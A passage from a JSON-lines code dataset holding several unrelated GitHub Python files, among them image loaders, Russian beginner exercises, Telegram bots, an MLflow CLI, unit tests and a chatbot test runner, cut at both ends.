x_train.append(flatten_image)\n t_train.append([row.label_id])\n \n \n \n print('done.')\n \n x_test = np.array(x_test, dtype=np.float32)\n t_test = np.array(t_test, dtype=np.int)\n x_train = np.array(x_train, dtype=np.float32)\n t_train = np.array(t_train, dtype=np.int)\n \n return x_train, t_train, x_test, t_test\n\n#正規化\ndef normalizer(x, axis = None):\n xmean = x.mean(axis=axis, keepdims=True)\n xstd = np.std(x, axis=axis, keepdims=True)\n zscore = (x-xmean)/xstd\n return zscore\n\n#labelと文字列\ndef load_corr_table():\n \n label_table = pd.read_table('./signate_画像10種類/label_master.tsv')\n return label_table\n\nif __name__ == '__main__':\n x,t,a,b = load_image(normalize=True, to_gray_scale=True)\n","repo_name":"kichie/dnn-not-using-libraly","sub_path":"load_image.py","file_name":"load_image.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41297797967","text":"\"\"\"\nЗадача 1. Склады\nУ мебельного магазина есть два склада, на которых хранятся разные категории товаров по парам «название — количество»:\nsmall_storage = {\n 'гвозди': 5000,\n 'шурупы': 3040,\n 'саморезы': 2000\n}\n\nbig_storage = {\n 'доски': 1000,\n 'балки': 150,\n 'рейки': 600\n}\n\nМагазин решил сократить аренду и скинуть все товары в большой склад (big_storage).\nПосле этого нас попросили реализовать поиск по товарам.\nНапишите программу, которая объединяет оба словаря в один (в big_storage), затем запрашивает у пользователя название\nтовара и выводит на экран его количество. Если такого товара нет, то выводит об этом ошибку. Для получения значения используйте метод get.\n\nЗадача 2. Кризис фруктов\nМы работаем в одной небольшой торговой компании, где все данные о продажах фруктов за год сохранены в словаре\nв виде пар «название фрукта — доход»:\nincomes = {\n 'apple': 5600.20,\n 'orange': 3500.45,\n 'banana': 5000.00,\n 'bergamot': 3700.56,\n 'durian': 5987.23,\n 'grapefruit': 300.40,\n 'peach': 10000.50,\n 'pear': 1020.00,\n 'persimmon': 310.00,\n}\n\nВ компании наступил небольшой кризис, и нам поручено провести небольшой анализ дохода.\nНапишите программу, которая находит общий доход, затем выводит фрукт с минимальным доходом и удаляет его из словаря.\nВыведите итоговый словарь на экран.\nРезультат работы программы:\nОбщий доход за год составил 35419.34 рублей\nСамый маленький доход у grapefruit. Он составляет 300.4 рублей\nИтоговый словарь: {'apple': 5600.2, 'orange': 3500.45, 'banana': 5000.0, 'bergamot': 3700.56, 'durian': 5987.23,\n'peach': 10000.5, 'pear': 1020.0, 'persimmon': 310.0}\n\nЗадача 3. Гистограмма частоты\nЛингвистам нужно собрать данные о частоте букв в тексте, исходя из этих данных будет строиться гистограмма частоты букв.\nНап��шите программу, которая получает сам текст и считает, сколько раз в строке встречается каждый символ.\nНа экран нужно вывести содержимое в виде таблицы, отсортированное по алфавиту, а также максимальное значение частоты.\n\nПример:\nВведите текст: Здесь что-то написано\n : 2\n- : 1\nЗ : 1\nа : 2\nд : 1\nе : 1\nи : 1\nн : 2\nо : 3\nп : 1\nс : 2\nт : 2\nч : 1\nь : 1\nМаксимальная частота: 3\n\"\"\"\n\ntask = int(input('Выберите какую задачу выполнить (1, 2, 3): '))\n\nif task == 1:\n # Задача 1\n print('=' * 40)\n\n small_storage = {\n 'гвозди': 5000,\n 'шурупы': 3040,\n 'саморезы': 2000\n }\n\n big_storage = {\n 'доски': 1000,\n 'балки': 150,\n 'рейки': 600\n }\n\n for i_product in small_storage:\n if i_product in big_storage:\n big_storage[i_product] += small_storage[i_product]\n else:\n big_storage[i_product] = small_storage[i_product]\n\n product = input('Введите название товара: ')\n res = big_storage.get(product)\n if res != None:\n print('Количество на складе: ', res)\n else:\n print('Товара нет.')\n print(big_storage)\n\n\nelif task == 2:\n # Задача 2\n print('=' * 40)\n print('Задача 2')\n\n incomes = {\n 'apple': 5600.20,\n 'orange': 3500.45,\n 'banana': 5000.00,\n 'bergamot': 3700.56,\n 'durian': 5987.23,\n 'grapefruit': 300.40,\n 'peach': 10000.50,\n 'pear': 1020.00,\n 'persimmon': 310.00,\n }\n name = ''\n summ_price = sum(incomes.values())\n min_product = min(incomes.values())\n for i_name in incomes:\n if incomes[i_name] == min_product:\n name = i_name\n incomes.pop(name)\n print('Общий доход за год составил {} рублей'.format(summ_price))\n print('Самый маленький доход у {name}. Он составляет {price} рублей'.format(name=name, price=min_product))\n print('Итоговый словарь:', incomes)\n\n\nelif task == 3:\n # Задача 3\n print('=' * 40)\n print('Задача 3')\n\n\n simbol_dict = dict()\n text = input('Введите текст: ').lower()\n for simb in text:\n if simb in simbol_dict:\n simbol_dict[simb] += 1\n else:\n simbol_dict[simb] = 1\n\n for num in sorted(simbol_dict.keys()):\n print(num, ':', simbol_dict[num])\n print('Максимальная частота:', max(simbol_dict.values()))\n\n\nelse:\n print('Выберите задачу заново.')","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 19/Практика/lesson 19.2.py","file_name":"lesson 19.2.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70867134182","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#@time: 2020/6/16 8:49\n\nimport traceback\nimport logging\n\n#定义日志格式\nlogging.basicConfig(\n filename='app2.log', #日志文件名,会在当前目录生成这个文件\n datefmt='%Y-%m-%d %H:%M:%S', #时间\n level=0, #日志级别 大于等于这个值,才会输出 #如果是40,就知会输出critical和error\n # 这个level不写,默认是30\n format='%(asctime)s-%(name)s-%(levelname)s-%(module)s-%(message)s' #日志格式\n #2020-06-16 08:14:13-root-ERROR-07日志处理-我是error\n #asctime 时间 #这里的格式是datefmt定义的\n #name root\n #levelname ERROR 日志级别\n #module 模块-文件名\n #message 提示信息\n)\n\n#关于日志级别\n# CRITICAL = 50\n# FATAL = CRITICAL\n# ERROR = 40\n# WARNING = 30\n# WARN = WARNING\n# INFO = 20\n# DEBUG = 10\n# NOTSET = 0\n\n#报错就写日志 #重点\nfor i in range(3):\n try:\n if i % 3 == 0:\n raise FileNotFoundError('文件没有找到哈')#主动抛出异常\n elif i % 3 == 1:\n raise FileExistsError()\n elif i % 3 == 2:\n raise StopIteration()\n except FileNotFoundError as e:\n val = traceback.format_exc() #记录报错的堆栈信息,错误在哪一行\n logging.error(val)\n except FileExistsError as e:\n val = traceback.format_exc()\n logging.error(val)\n except StopIteration as e:\n val = traceback.format_exc()\n logging.error(val)\n except Exception as e:\n val = traceback.format_exc()\n logging.error(val)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cn5036518/xq_py","sub_path":"python16/day1-21/day020 约束和异常处理/07_2日志处理2.py","file_name":"07_2日志处理2.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1332481425","text":"from __future__ import print_function\nimport json\nimport telegram\nimport os\nimport logging\n\n# Logging is cool!\nlogger = logging.getLogger()\nif logger.handlers:\n for handler in logger.handlers:\n logger.removeHandler(handler)\nlogging.basicConfig(level=logging.INFO)\n\ndef configure_telegram():\n \"\"\"\n Configures the bot with a Telegram Token.\n Returns a bot instance.\n \"\"\"\n\n TELEGRAM_TOKEN = os.environ.get('TELEGRAM_TOKEN')\n if not TELEGRAM_TOKEN:\n logger.error('The TELEGRAM_TOKEN must be set')\n raise NotImplementedError\n\n return telegram.Bot(TELEGRAM_TOKEN)\n\ndef extract_values(obj, key):\n \"\"\"Pull all values of specified key from nested JSON.\"\"\"\n arr = []\n\n def extract(obj, arr, key):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, key)\n elif k == key:\n arr.append(v)\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, key)\n return arr\n\n results = extract(obj, arr, key)\n return results\n\ndef lambda_handler(event, context):\n TELEGRAM_CHAT_ID = os.environ.get('TELEGRAM_CHAT_ID')\n bot = configure_telegram()\n for record in event['Records']:\n d = json.loads(record['body'])\n print(d['dynamodb']['Keys']['id']['S'])\n bot.send_message(text=d['dynamodb']['Keys']['id']['S'], chat_id=TELEGRAM_CHAT_ID)\n print('Successfully processed %s records.' % str(len(event['Records'])))\n return\n","repo_name":"kebabmane/serverless-telegram-rss","sub_path":"lambdas/publish_to_telegram/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21366657230","text":"import logging\nfrom typing import List, Optional\n\nimport typer\nfrom mlflow import __version__ as mlflow_version\n\nfrom mlflow_mlserver_docker.main import download_and_build\n\nfrom . import __version__\n\nlogging.basicConfig(level=logging.DEBUG)\n\napp = typer.Typer(\n help=\"Simple CLI tool that helps you package an MLflow model on an MLflow tacking server into a docker image capable of serving an mlserver-compliant inference webservice.\"\n)\n\n\n@app.command(help=\"Display the version\")\ndef version():\n \"\"\"Display the version information.\"\"\"\n print(\"mlflow-mlserver-docker: \", __version__)\n print(\"mlflow: \", mlflow_version)\n\n\n@app.command(help=\"Download model artifact and build into mlserver image\")\ndef build( # noqa: D103\n artifact_uri: str = typer.Argument( # noqa: B008\n ...,\n help=\"See https://www.mlflow.org/docs/latest/python_api/mlflow.artifacts.html for possible formats\",\n ),\n tag: Optional[List[str]] = typer.Option( # noqa: B008\n None,\n help=\"Tag the image (multiple values allowed!), otherwise no tag will be used\",\n ),\n log_level: str = typer.Option(\"INFO\"), # noqa: B008\n):\n logging.getLogger().setLevel(log_level)\n download_and_build(artifact_uri, tag)\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"dingobar/mlflow-mlserver-docker","sub_path":"mlflow_mlserver_docker/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"30792976754","text":"\"\"\"\nPredictcs a number\n\"\"\"\nimport cv2\nimport numpy as np\nfrom tensorflow.python.keras.models import load_model\nimport matplotlib.pyplot as plt\n\n\n\ndef predict(img):\n image = img.copy()\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # image = cv2.threshold(image, 140, 255, cv2.THRESH_BINARY)[1]\n image = cv2.resize(image, (28, 28))\n # display_image(image)\n image = image.astype('float32')\n image = image.reshape(1, 28, 28, 1)\n image /= 255\n\n # plt.imshow(image.reshape(28, 28), cmap='Greys')\n # plt.show()\n model = load_model('cnn.hdf5')\n pred = model.predict(image.reshape(1, 28, 28, 1), batch_size=1)\n\n print(\"Predicted Number: \", pred.argmax())\n\n # return pred.argmax()\n\npredict(cv2.imread('TestNumber.png'))\n","repo_name":"Joy2469/Deep-Learning-MNIST---Handwritten-Digit-Recognition","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"36018110757","text":"#!/usr/bin/env python3\n\nimport sys\nfrom loguru import logger\n\nsys.path.extend([\".\", \"..\", \"../..\"])\n\nfrom telegram import Update\nfrom telegram.ext import ApplicationBuilder, CommandHandler, ContextTypes\nimport settings\n\nfrom data.redis_db import RedisDB, SearchRequest\n\nindex = RedisDB()\n\nif index is not None and index.create_db():\n logger.info(\"Index database created for the first time.\")\n\n\nasync def search_memes(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Search matching memes in the database and return the bot respons text.\"\"\"\n req = update.message.text.removeprefix(\"/search \")\n\n logger.info(f\"Looking for {req}\")\n msgs = index.search(SearchRequest(\n query=req,\n ))\n\n res = [m.post_link for m in msgs]\n\n await update.message.reply_text(f\"Hello {res}\")\n\n\n# async def index_memes(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n# \"\"\"Index a chat.\"\"\"\n# scraper = TelegramScraper(storage, index)\n# await scraper.scrape_messages(update.message.text)\n# await update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\nasync def hello(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n await update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\ndef main():\n app = ApplicationBuilder().token(settings.TG_BOT_TOKEN).build()\n app.add_handler(CommandHandler(\"hello\", hello))\n app.add_handler(CommandHandler(\"search\", search_memes))\n # app.add_handler(CommandHandler(\"index\", index_memes))\n app.run_polling()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yamp/memgrep","sub_path":"scripts/start_api.py","file_name":"start_api.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"113564500","text":"#!/usr/bin/env python3\n\n\"\"\"PY210_SP - mailroom part 4 unit tests\nauthor: Nick Miller\"\"\"\n\nimport os\nimport mailroom_pt4 as mail\nfrom pathlib import Path\n\ndonor_db = {\n \"Jeff Staple\": [20, 20],\n \"Takashi Murakami\": [10.50],\n \"Virgil Abloh\": [300, 40.33, 5.35],\n \"Jan Chipchase\": [1001.23, 400.87, 102]\n}\n\ntest_db = {\n \"Donor One\": [10, 10],\n \"Donor Two\": [0],\n \"Donor Three\": [10, 25.50]\n}\n\n\ndef test_letter_prep():\n expected = ['jeff', 40.0]\n assert mail.letter_prep(\"jeff staple\", donor_db) == expected\n expected2 = ['donor', 35.5]\n assert mail.letter_prep(\"donor three\", test_db) == expected2\n\n\ndef test_letter_format():\n assert mail.letter_format(\"bob\", 10) == ('\\n'.join(['', 'Dearest bob,', '',\n 'Thank you for your generous support!',\n 'We appreciate your donation(s), which total $10.00 to date!', '',\n 'Sincerest regards,',\n '',\n 'The Foundation']))\n\n\ndef test_thanks_all():\n mail.thanks_all(test_db)\n assert os.path.isfile(\"janchipchase.txt\") is True\n assert os.path.isfile(\"jeffstaple.txt\") is True\n assert os.path.isfile(\"takashimurakami.txt\") is True\n\n\ndef test_save_file():\n mail.save_file(\"test.txt\", \"blah, blah\")\n assert os.path.isfile(\"test.txt\") is True\n expected = \"blah, blah\"\n assert Path('test.txt').read_text() == expected\n\n\ndef test_list_check():\n expected = \"jeff staple\"\n assert mail.list_check(\"jeff staple\", donor_db) == expected\n expected2 = \"not\"\n assert mail.list_check(\"donor four\", test_db) == expected2\n\n\ndef test_input_prep():\n test_str = \" HeLLo, HoW aRe YoU? \"\n expected = \"hello, how are you?\"\n assert mail.input_prep(test_str)\n\n\ndef test_input_check():\n expected = \"list\"\n assert mail.input_check(\"list\") == expected\n expected2 = \"y\"\n assert mail.input_check(\" Y\") == expected2\n\n\ndef test_db_update():\n expected = None\n assert mail.db_update(\"donor four\", 10, test_db) == expected\n\n\ndef test_report_sort_key():\n expected = 1\n assert mail.report_sort_key([0, 1]) == expected\n\n\ndef test_quit_prog():\n expected = \"exit menu\"\n assert mail.quit_prog() == expected\n\n\nprint(\"Function check:\")\nif test_letter_prep() is None:\n print(\"1. letter_prep() is good\")\nif test_letter_format() is None:\n print(\"2. letter_format() is good\")\nif test_input_prep() is None:\n print(\"3. input_prep() is good\")\nif test_thanks_all() is None:\n print(\"4. thanks_all() is good\")\nif test_list_check() is None:\n print(\"5. list_check() is good\")\nif test_input_check() is None:\n print(\"6. input_check() is good\")\nif test_db_update() is None:\n print(\"7. db_update() is good\")\nif test_save_file() is None:\n print(\"8. save_file() is good\")\nif test_report_sort_key() is None:\n print(\"9. report_sort_key() is good\")\nif test_quit_prog() is None:\n print(\"10. quit_prog() is good\")\nprint()\nprint(\"10 tests run\")\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/nick_miller/lesson06/test_mailroom-pt4.py","file_name":"test_mailroom-pt4.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"31454697919","text":"import json\nfrom threading import Thread\nfrom handler import run_handler\nfrom sender import run_sender\n\n\ndef init_users_data():\n with open(\"users.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump({\"users\": {}}, file, indent=4)\n\n\ndef run_bot():\n init_users_data()\n\n handler_thread = Thread(target=run_handler)\n handler_thread.start()\n\n sender_thread = Thread(target=run_sender)\n sender_thread.start()\n\n\nif __name__ == \"__main__\":\n run_bot()\n","repo_name":"dexety/dex-trading-system","sub_path":"bots/dydx_state/run_bot.py","file_name":"run_bot.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15541631822","text":"from __future__ import annotations\n\nimport shutil\nimport subprocess\n\n\ndef test_merge_cbf(dials_data, tmp_path):\n data_dir = dials_data(\"centroid_test_data\", pathlib=True)\n\n g = sorted(data_dir.glob(\"*.cbf\"))\n assert len(g) == 9\n\n cmd = [shutil.which(\"dials.merge_cbf\"), \"merge_n_images=3\"] + g\n result = subprocess.run(cmd, cwd=tmp_path, capture_output=True)\n assert not result.returncode and not result.stderr\n g = sorted(tmp_path.glob(\"sum_*.cbf\"))\n assert len(g) == 3\n\n # test alternate mode of accessing image data\n cmd += [\"image_prefix=sum2_\", \"get_raw_data_from_imageset=false\"]\n result = subprocess.run(cmd, cwd=tmp_path, capture_output=True)\n assert not result.returncode and not result.stderr\n\n g2 = sorted(tmp_path.glob(\"sum2_*.cbf\"))\n assert len(g2) == 3\n\n # check summed images are the same in either case\n for f1, f2 in zip(g, g2):\n print(\"Testing\", f1, f2)\n assert f1.read_bytes() == f2.read_bytes()\n","repo_name":"dials/dials","sub_path":"tests/command_line/test_merge_cbf.py","file_name":"test_merge_cbf.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"35"} +{"seq_id":"40105331848","text":"import csv\nimport re\nimport datetime\nimport os\n\nfrom programr.clients.client import BotClient\nfrom programr.utils.files.filefinder import FileFinder\nfrom programr.clients.events.console.config import ConsoleConfiguration\n# from programr.utils.logging.ylogger import YLogger\n\nclass TestQuestion(object):\n\n def __init__(self, question, answers, topic=None, that=None):\n self._category = None\n self._question = question\n self._answers = answers\n self._answers_regex = []\n self._topic = topic\n self._that = that\n for answer in answers:\n if answer is not None and answer:\n if answer[0] == \"!\":\n self._answers_regex.append((\"-\", re.compile(answer)))\n else:\n self._answers_regex.append((\"+\", re.compile(answer)))\n self._response = None\n\n @property\n def category(self):\n return self._category\n\n @category.setter\n def category(self, category):\n self._category = category\n\n @property\n def question(self):\n return self._question\n\n @property\n def answers(self):\n return self._answers\n\n @property\n def answers_regex(self):\n return self._answers_regex\n\n @property\n def answers_string(self):\n return \" or \".join(self._answers)\n\n @property\n def response(self):\n return self._response\n\n @response.setter\n def response(self, response):\n self._response = response\n\n @property\n def topic(self):\n return self._topic\n\n @property\n def that(self):\n return self._that\n\nclass TestFileFileFinder(FileFinder):\n\n def __init__(self):\n super().__init__()\n\n def empty_row(self, row):\n return bool(len(row) < 2)\n\n def is_comment(self, question):\n return bool(question[0] == '#')\n\n def is_template(self, question):\n return bool(question[0] == '$')\n\n def clean_up_answer(self, text):\n return text.replace('\"', \"\").strip()\n\n def add_answers_to_template(self, row, question, templates):\n answers = []\n for answer in row[1:]:\n answers.append(self.clean_up_answer(answer))\n templates[question] = answers\n\n def add_template_answers(self, templates, answer, answers):\n if answer in templates:\n template = templates[answer]\n for template_answer in template:\n answers.append(template_answer)\n else:\n print(\"Template [%s] not found!\" % answer)\n\n def load_file_contents(self, filename, userid=\"*\"):\n print(\"Loading aiml_tests from file [%s]\" % filename)\n questions = []\n templates = {}\n with open(filename, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n if self.empty_row(row) is False:\n question = row[0]\n if self.is_comment(question) is False:\n if self.is_template(question):\n self.add_answers_to_template(row, question, templates)\n else:\n answers = []\n that = None\n topic = None\n for answer in row[1:]:\n answer = answer.strip()\n if answer:\n if self.is_template(answer):\n self.add_template_answers(templates, answer, answers)\n else:\n if answer.startswith(\"\\\"THAT=\"):\n thatsplits = self.clean_up_answer(answer).split(\"=\")\n that = thatsplits[1]\n elif answer.startswith(\"\\\"TOPIC=\"):\n topicsplits = self.clean_up_answer(answer).split(\"=\")\n topic = topicsplits[1]\n else:\n answers.append(self.clean_up_answer(answer))\n questions.append(TestQuestion(question, answers, topic=topic, that=that))\n return questions\n\n\n def get_just_filename_from_filepath(self, filepath):\n\n if os.sep in filepath:\n pathsplits = filepath.split(os.sep)\n filename_ext = pathsplits[-1]\n else:\n filename_ext = filepath\n\n if \".\" in filename_ext:\n filesplits = filename_ext.split(\".\")\n filename = filesplits[0]\n else:\n filename = filename_ext\n\n return filename\n\n def find_files(self, path, subdir=False, extension=None):\n # print(\"Path: {}\".format(path))\n found_files = []\n try:\n if subdir is False:\n paths = os.listdir(path)\n for filename in paths:\n if filename.endswith(extension):\n found_files.append((filename, os.path.join(path, filename)))\n else:\n for dirpath, _, filenames in os.walk(path):\n # print(\"filenames: {}\".format(filenames))\n for filename in [f for f in filenames if f.endswith(extension)]:\n found_files.append((filename, os.path.join(dirpath, filename)))\n except FileNotFoundError:\n # YLogger.error(self, \"No directory found [%s]\", path)\n a = 0\n\n return sorted(found_files, key=lambda element: (element[1], element[0]))\n\n def load_dir_contents(self, paths, subdir=False, extension=\".txt\", filename_as_userid=False):\n # print(\"Paths: {}\".format(paths))\n # print(\"Subdir: {}\".format(subdir))\n files = self.find_files(paths, subdir, extension)\n # print(\"Files: {}\".format(files))\n\n collection = {}\n file_maps = {}\n num = 0\n for file in files:\n just_filename = self.get_just_filename_from_filepath(file[0])\n try:\n if filename_as_userid:\n userid = just_filename\n else:\n userid = \"*\"\n # print(\"#################file[1]: {}\".format(file[1]))\n collection[just_filename.upper()] = self.load_file_contents(file[1], num)\n file_maps[just_filename.upper()] = file[1]\n num += 1\n except Exception as excep:\n print(excep)\n # YLogger.exception(self, \"Failed to load file contents for file [%s]\"% file[1], excep)\n\n return collection, file_maps\n\n\n def load_single_file_contents(self, filename):\n just_filename = self.get_just_filename_from_filepath(filename)\n\n collection = {}\n file_maps = {}\n try:\n collection[just_filename.upper()] = self.load_file_contents(filename)\n # file_maps[just_filename.upper()] = filename\n except Exception as excep:\n print(excep)\n # YLogger.exception(self, \"Failed to load file contents for file [%s]\"%filename, excep)\n\n return collection, file_maps\n\n\nclass TestRunnerBotClient(BotClient):\n\n def __init__(self):\n super().__init__(\"TestRunner\")\n\n @property\n def test_dir(self):\n return self.arguments.args.test_dir\n\n @property\n def test_file(self):\n return self.arguments.args.test_file\n\n @property\n def qna_file(self):\n return self.arguments.args.qna_file\n\n @property\n def verbose(self):\n return self.arguments.args.verbose\n\n def get_description(self):\n return 'ProgramR Test Runner Client'\n\n def ask_question(self, userid, question):\n response = \"\"\n try:\n client_context = self.create_bot(userid)\n response = client_context.bot.ask_question(client_context, question)\n response = self.remove_oob(response)\n return response\n except Exception as e:\n print(e)\n return \"\"\n \n def remove_oob(self, response):\n return re.sub('', '', response)\n\n def add_client_arguments(self, parser=None):\n if parser is not None:\n parser.add_argument('--test_dir', dest='test_dir', help='directory containing test files to run against grammar')\n parser.add_argument('--test_file', dest='test_file', help='Single file of aiml_tests to run against grammar')\n parser.add_argument('--qna_file', dest='qna_file', help='A file containing questions and answers')\n parser.add_argument('--verbose', dest='verbose', action='store_true', help='print out each question to be asked')\n\n def set_environment(self):\n self.bot.brain.properties.add_property(\"env\", \"TestRunner\")\n\n def get_client_configuration(self):\n return ConsoleConfiguration()\n\n def write_to_file(self, tag, filename):\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (tag.category, tag.question, tag.answers_string, tag.response)\n s = \"results/\" + filename\n f = open(s, \"a\")\n f.write(line)\n f.close()\n\n def run(self):\n file_finder = TestFileFileFinder()\n if self.test_dir is not None:\n print(\"Loading Tests from directory [%s]\" % self.test_dir)\n questions = file_finder.load_dir_contents(self.test_dir, extension=\".tests\", subdir=False)\n else:\n print(\"Loading single file: {}\".format(self.test_file))\n questions = file_finder.load_single_file_contents(self.test_file)\n\n question_and_answers = open(self.qna_file, \"w+\")\n # print(\"Question and answers: {}.\".format(type(question_and_answers)))\n\n # out = dict(list(questions[1].keys())[0: 2])\n\n successes = []\n failures = []\n warnings = 0\n start = datetime.datetime.now()\n # print(\"Questions: {}\".format(type(questions[0])))\n # print(\"Questions: {}\".format(questions[0]))\n # print(\"Questions: {}\".format(type(questions[1])))\n # print(\"Questions: {}\".format(out))\n # print(\"Other: {}\".format(other))\n for category in questions[0].keys():\n for test in questions[0][category]:\n test.category = category\n \n # TODO: Still need way to handle srai tag\n # print(\"test.answers_regex: {}\".format(test.answers_regex[0][1].pattern))\n # # print(\"test.answers_regex[0][1]: {}\".format(type(test.answers_regex[0][1])))\n # pattern = test.answers_regex[0][1].pattern\n # if pattern[0:6] == \"\":\n # print(\"SRAI tag detected!!\")\n # test.answers_regex[0][1].pattern = re.sub('', '', pattern)\n # print(\"test.answers_regex after removal: {}\".format(test.answers_regex[0][1]))\n\n if any((c in '$*_^#') for c in test.question):\n try:\n test.question = test.question.replace(\"\", any((c in '$*_^#')))\n except Exception as e:\n print(\"WARNING: Wildcards in question! [%s]\"%test.question)\n warnings = warnings +1\n\n if test.topic is not None:\n conversation = self.get_conversation(0)\n conversation.set_property(\"topic\", test.topic)\n\n if test.that is not None:\n response = self.ask_question(0, test.that)\n else:\n response = self.ask_question(0, test.question)\n \n success = False\n test.response = response\n\n if self.verbose:\n print(test.question, \"->\", test.response)\n question_and_answers.write('\"%s\", \"%s\"\\n'%(test.question, test.response))\n\n if not test.answers_regex:\n if test.response == \"\":\n break\n else:\n for expected_regex in test.answers_regex:\n # print(\"test.answers_regex: {}\".format(test.answers_regex))\n regex_type = expected_regex[0]\n expression = expected_regex[1]\n match = expression.search(response)\n if match is not None and regex_type == \"+\":\n success = True\n break\n elif match is None and regex_type == \"-\":\n success = True\n break\n\n if success:\n successes.append(test)\n else:\n failures.append(test)\n\n question_and_answers.flush ()\n question_and_answers.close ()\n\n stop = datetime.datetime.now()\n diff = stop-start\n total_tests = len(successes)+len(failures)\n\n \n if warnings > 0:\n print(\"Warnings: %d\" % warnings)\n for failure in failures:\n print(\"\\t%s: [%s] expected [%s], got [%s]\" % (failure.category, failure.question, failure.answers_string, failure.response))\n if failure.answers_string is \"None\" or failure.answers_string is \"\":\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (failure.category, failure.question, failure.answers_string, failure.response)\n f = open(\"results/empty.txt\", \"a\")\n f.write(line)\n f.close()\n else:\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (failure.category, failure.question, failure.answers_string, failure.response)\n f = open(\"results/errors.txt\", \"a\")\n f.write(line)\n f.close()\n\n for success in successes:\n line = \"\\t%s: [%s] expected [%s], got [%s]\\n\" % (success.category, success.question, success.answers_string, success.response)\n f = open(\"results/successes.txt\", \"a\")\n f.write(line)\n f.close()\n\n print(\"Total processing time %f.2 secs\"%diff.total_seconds())\n print(\"Thats approx %f aiml_tests per sec\"%(total_tests/diff.total_seconds()))\n print(\"Successes: %d\" % len(successes))\n print(\"Failures: %d\" % len(failures))\n\nif __name__ == '__main__':\n\n def run():\n print(\"Loading, please wait...\")\n console_app = TestRunnerBotClient()\n console_app.run()\n\n run()\n","repo_name":"roholazandie/retrieval_based_chatbot","sub_path":"utils_programr/test_runner/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":14617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6405490556","text":"'''\nconvert GRCh37 to GRCh38 if necessary\ntypes:\n INV, LOSS, GAIN\nchange into tsv\ncolumns:\n chrom\n start\n end\n sv_id\n filter\n source\n genotype\n CN\n type\n genes\n'''\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nfrom lib import Interval_base, utils\nimport gzip\nimport argparse\nimport tempfile\nimport pysam\nimport subprocess\n\ndef get_genes_from_line(row_dict, build, genes, csqt_header=None):\n '''\n GRCh37 gives ensembl_gene_id\n GRCh38 gives symbol under CSQT\n will return\n {value: set(), type: ensembl_id|symbol}\n '''\n result = set()\n for info in row_dict['INFO'].split(';'):\n if build == 'GRCh37' and info.startswith('ensembl_gene_id'):\n ensembl_ids = set( info.split('=')[1].split(',') )\n result.update([i['ensembl_id'] for i in genes if i['ensembl_id'] in ensembl_ids])\n elif build == 'GRCh38' and info.startswith('CSQT'):\n symbols = set()\n if csqt_header is None:\n raise ValueError('Need to provide csqt_header to parse for GRCh38')\n for csqt_field in info.split('=')[1].split(','):\n csqt = dict(zip(csqt_header, csqt_field.split('|')))\n symbols.add(csqt['HGNC'])\n result.update([i['ensembl_id'] for i in genes if i['symbol'] in symbols])\n return result\n\nclass Interval(Interval_base):\n def __init__(self, row_dict):\n ID = row_dict['ID'].split(':')\n chrom = row_dict.get('chrom', row_dict['CHROM'])\n start = int(row_dict['start'])\n self.info = {}\n for field in row_dict['INFO'].split(';'):\n if '=' in field:\n key,val = field.split('=')\n self.info[key] = val\n else:\n self.info[field] = True\n\n # if liftover, row_dict will have an end entry. if not, get it from info\n end = int(row_dict.get('end', self.info['END']))\n\n super().__init__(chrom, start, end)\n self.type = None\n if ID[0] == 'Canvas':\n self.source = 'Canvas'\n self.type = ID[1]\n else:\n # only deal with MantaDEL and MantaINV\n self.source = 'Manta'\n if ID[0] == 'MantaDEL':\n self.type = 'LOSS'\n elif ID[0] == 'MantaINV':\n self.type = 'INV'\n self.alt = row_dict['ALT']\n self.sv_id = 